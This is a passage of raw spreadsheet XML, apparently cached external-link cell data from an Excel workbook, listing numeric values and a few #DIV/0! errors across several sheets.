            <v>147.881666666667</v>
          </cell>
          <cell r="S81">
            <v>3043.645</v>
          </cell>
          <cell r="T81">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U81">
            <v>41.0782407407407</v>
          </cell>
          <cell r="V81">
            <v>36.3376910219675</v>
          </cell>
          <cell r="W81">
            <v>291.875</v>
          </cell>
          <cell r="X81">
            <v>281.291190028063</v>
          </cell>
          <cell r="Y81">
            <v>275.953276416928</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="16">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10450.565</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>2e-11</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>683.38</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>35133.7400000505</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>636</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4170.01</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>43982.0589999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>85</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5969.43</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>507</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>12563.47</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2515.92</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>20627.507</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>365</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4410.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>150.43</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>31</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3511.23600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>247.38</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.6e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000357</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.25e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.13165266106443e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>2.880016</v>
          </cell>
          <cell r="S73">
            <v>5784.610357</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>0.750004166666667</v>
          </cell>
          <cell r="V73">
            <v>68.8644090119048</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>133.631202048933</v>
          </cell>
          <cell r="Y73">
            <v>239.247248230863</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.5e-10</v>
          </cell>
          <cell r="S76">
            <v>3.45e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.90625e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10714285714286e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>2.60416666666667e-12</v>
          </cell>
          <cell r="V77">
            <v>60.2359523809538</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>6.08305555555556</v>
          </cell>
          <cell r="R79">
            <v>191.1975</v>
          </cell>
          <cell r="S79">
            <v>3828.75638888889</v>
          </cell>
          <cell r="T79">
            <v>25.3460648148148</v>
          </cell>
          <cell r="U79">
            <v>49.791015625</v>
          </cell>
          <cell r="V79">
            <v>45.5804332010582</v>
          </cell>
          <cell r="W79">
            <v>104.552719302251</v>
          </cell>
          <cell r="X79">
            <v>100.409262673414</v>
          </cell>
          <cell r="Y79">
            <v>102.167638854014</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>0</v>
          </cell>
          <cell r="R80">
            <v>149.664444444444</v>
          </cell>
          <cell r="S80">
            <v>2754.52027777778</v>
          </cell>
          <cell r="T80">
            <v>0</v>
          </cell>
          <cell r="U80">
            <v>38.9751157407407</v>
          </cell>
          <cell r="V80">
            <v>32.7919080687831</v>
          </cell>
          <cell r="W80" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X80">
            <v>85.0235341281979</v>
          </cell>
          <cell r="Y80">
            <v>79.4479538834802</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>0</v>
          </cell>
          <cell r="R81">
            <v>147.881666666667</v>
          </cell>
          <cell r="S81">
            <v>3043.645</v>
          </cell>
          <cell r="T81">
            <v>0</v>
          </cell>
          <cell r="U81">
            <v>38.5108506944444</v>
          </cell>
          <cell r="V81">
            <v>36.2338690476191</v>
          </cell>
          <cell r="W81" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X81">
            <v>281.291190028063</v>
          </cell>
          <cell r="Y81">
            <v>275.953276416928</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="17">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10450.565</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>2e-11</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>1816.311</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>33317.4290000505</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>2442</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5074.126</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>41349.9329999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>165.43</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5804</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>572.57</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>11990.9</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3014.536</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>17612.971</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>352</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>4058.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>136.71</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>98</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3549.94600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>64.3110000000006</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.7e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000358</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24976258309592e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.1340782122905e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>2.880017</v>
          </cell>
          <cell r="S73">
            <v>5784.610358</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>0.705886519607843</v>
          </cell>
          <cell r="V73">
            <v>68.6682141263058</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>133.631155649488</v>
          </cell>
          <cell r="Y73">
            <v>239.247248189504</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.6e-10</v>
          </cell>
          <cell r="S76">
            <v>3.46e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.92156862745098e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10731244064577e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>2.45098039215686e-12</v>
          </cell>
          <cell r="V77">
            <v>60.0643399810081</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>23.9997222222222</v>
          </cell>
          <cell r="R79">
            <v>215.197222222222</v>
          </cell>
          <cell r="S79">
            <v>3852.75611111111</v>
          </cell>
          <cell r="T79">
            <v>99.9988425925926</v>
          </cell>
          <cell r="U79">
            <v>52.744417211329</v>
          </cell>
          <cell r="V79">
            <v>45.7354714044529</v>
          </cell>
          <cell r="W79">
            <v>101.751177675668</v>
          </cell>
          <cell r="X79">
            <v>100.558918821236</v>
          </cell>
          <cell r="Y79">
            <v>102.165044619573</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>0</v>
          </cell>
          <cell r="R80">
            <v>149.664444444444</v>
          </cell>
          <cell r="S80">
            <v>2754.52027777778</v>
          </cell>
          <cell r="T80">
            <v>0</v>
          </cell>
          <cell r="U80">
            <v>36.6824618736383</v>
          </cell>
          <cell r="V80">
            <v>32.6984838292709</v>
          </cell>
          <cell r="W80" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X80">
            <v>85.0235341281979</v>
          </cell>
          <cell r="Y80">
            <v>79.4479538834802</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>0</v>
          </cell>
          <cell r="R81">
            <v>147.881666666667</v>
          </cell>
          <cell r="S81">
            <v>3043.645</v>
          </cell>
          <cell r="T81">
            <v>0</v>
          </cell>
          <cell r="U81">
            <v>36.2455065359477</v>
          </cell>
          <cell r="V81">
            <v>36.130638651472</v>
          </cell>
          <cell r="W81" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X81">
            <v>281.291190028063</v>
          </cell>
          <cell r="Y81">
            <v>275.953276416928</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="18">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10450.565</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>2e-11</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>1641.074</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>31676.3550000505</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>1622</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5376.891</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>37595.0419999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>122.31</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5681.69</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>882</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>11108.9</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3509.011</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>14103.96</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>327</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>3731.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>68</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3481.94600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>446.574</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.8e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000359</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24952651515152e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.13649025069638e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>2.880018</v>
          </cell>
          <cell r="S73">
            <v>5784.610359</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>0.666670833333333</v>
          </cell>
          <cell r="V73">
            <v>68.473133984375</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>133.631109250074</v>
          </cell>
          <cell r="Y73">
            <v>239.247248148145</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.7e-10</v>
          </cell>
          <cell r="S76">
            <v>3.47e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.93518518518519e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10748106060606e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>2.31481481481481e-12</v>
          </cell>
          <cell r="V77">
            <v>59.8937026515166</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>14.5</v>
          </cell>
          <cell r="R79">
            <v>229.697222222222</v>
          </cell>
          <cell r="S79">
            <v>3867.25611111111</v>
          </cell>
          <cell r="T79">
            <v>60.4166666666667</v>
          </cell>
          <cell r="U79">
            <v>53.1706532921811</v>
          </cell>
          <cell r="V79">
            <v>45.7771793455387</v>
          </cell>
          <cell r="W79">
            <v>111.862068965517</v>
          </cell>
          <cell r="X79">
            <v>101.272448029411</v>
          </cell>
          <cell r="Y79">
            <v>102.20140291832</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>0</v>
          </cell>
          <cell r="R80">
            <v>149.664444444444</v>
          </cell>
          <cell r="S80">
            <v>2754.52027777778</v>
          </cell>
          <cell r="T80">
            <v>0</v>
          </cell>
          <cell r="U80">
            <v>34.6445473251029</v>
          </cell>
          <cell r="V80">
            <v>32.6055904093014</v>
          </cell>
          <cell r="W80" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X80">
            <v>85.0235341281979</v>
          </cell>
          <cell r="Y80">
            <v>79.4479538834802</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>0</v>
          </cell>
          <cell r="R81">
            <v>147.881666666667</v>
          </cell>
          <cell r="S81">
            <v>3043.645</v>
          </cell>
          <cell r="T81">
            <v>0</v>
          </cell>
          <cell r="U81">
            <v>34.2318672839506</v>
          </cell>
          <cell r="V81">
            <v>36.0279947916667</v>
          </cell>
          <cell r="W81" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X81">
            <v>281.291190028063</v>
          </cell>
          <cell r="Y81">
            <v>275.953276416928</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="19">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10450.565</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>2e-11</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>706.547</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>30969.8080000506</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>5068.027</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>32527.0149999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>335.98</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5345.71</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>242</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>10866.9</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>3509.047</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>10594.913</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>256</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>3475.80199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>110.66</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3592.60600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>706.547</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>1.9e-5</v>
          </cell>
          <cell r="S72">
            <v>0.00036</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24929178470255e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.13888888888889e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>1e-6</v>
          </cell>
          <cell r="R73">
            <v>2.880019</v>
          </cell>
          <cell r="S73">
            <v>5784.61036</v>
          </cell>
          <cell r="T73">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U73">
            <v>0.631583114035088</v>
          </cell>
          <cell r="V73">
            <v>68.2791591123702</v>
          </cell>
          <cell r="W73">
            <v>1e-5</v>
          </cell>
          <cell r="X73">
            <v>133.631062850693</v>
          </cell>
          <cell r="Y73">
            <v>239.247248106786</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>1.8e-10</v>
          </cell>
          <cell r="S76">
            <v>3.48e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.94736842105263e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10764872521247e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>1e-11</v>
          </cell>
          <cell r="R77">
            <v>1e-11</v>
          </cell>
          <cell r="S77">
            <v>5059.82000000012</v>
          </cell>
          <cell r="T77">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U77">
            <v>2.19298245614035e-12</v>
          </cell>
          <cell r="V77">
            <v>59.7240321057616</v>
          </cell>
          <cell r="W77">
            <v>0</v>
          </cell>
          <cell r="X77">
            <v>0</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>0</v>
          </cell>
          <cell r="R79">
            <v>229.697222222222</v>
          </cell>
          <cell r="S79">
            <v>3867.25611111111</v>
          </cell>
          <cell r="T79">
            <v>0</v>
          </cell>
          <cell r="U79">
            <v>50.3721978557505</v>
          </cell>
          <cell r="V79">
            <v>45.6474989507921</v>
          </cell>
          <cell r="W79" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X79">
            <v>101.272448029411</v>
          </cell>
          <cell r="Y79">
            <v>102.20140291832</v>
          </cell>
